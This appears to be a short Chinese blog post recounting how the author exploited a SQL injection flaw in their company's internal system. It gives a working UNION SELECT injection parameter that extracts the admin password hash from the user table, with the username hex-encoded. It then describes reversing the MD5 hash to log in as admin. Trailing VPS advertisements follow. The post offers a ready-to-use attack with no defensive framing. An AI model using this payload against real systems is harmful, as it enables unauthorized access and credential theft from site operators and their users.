刚刚发现公司程序代码有SQL注入 and 1=1 注入漏洞,由于是内部系统所以省去很多麻烦我这边就不需要去爆具体查表结构了,直接上侵入的地址参数。

?id=1598%20union%20select%201,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22%20from%20user%20where%20username=0x61646d696e%20limit%201,1

这里 username=admin ,然后通过16进制以后变成: 61646d696e ,前面需要加 0x 变成16进制。

红色涂改部分为:admin的密码。然后通过MD5值反向解密,或者admin用户的密码。登录成功!

腾讯云限时秒杀【点击购买】

搬瓦工,CN2高速线路,1GB带宽,电信联通优化KVM,延迟低,速度快,建站稳定,搬瓦工BandwagonHost VPS优惠码BWH26FXH3HIQ,支持<支付宝> 【点击购买】!

Vultr$3.5日本节点,512M内存/500G流量/1G带宽,电信联通优化,延迟低,速度快【点击购买】!

阿里云香港、新加坡VPS/1核/1G/25G SSD/1T流量/30M带宽/年付¥288【点击购买】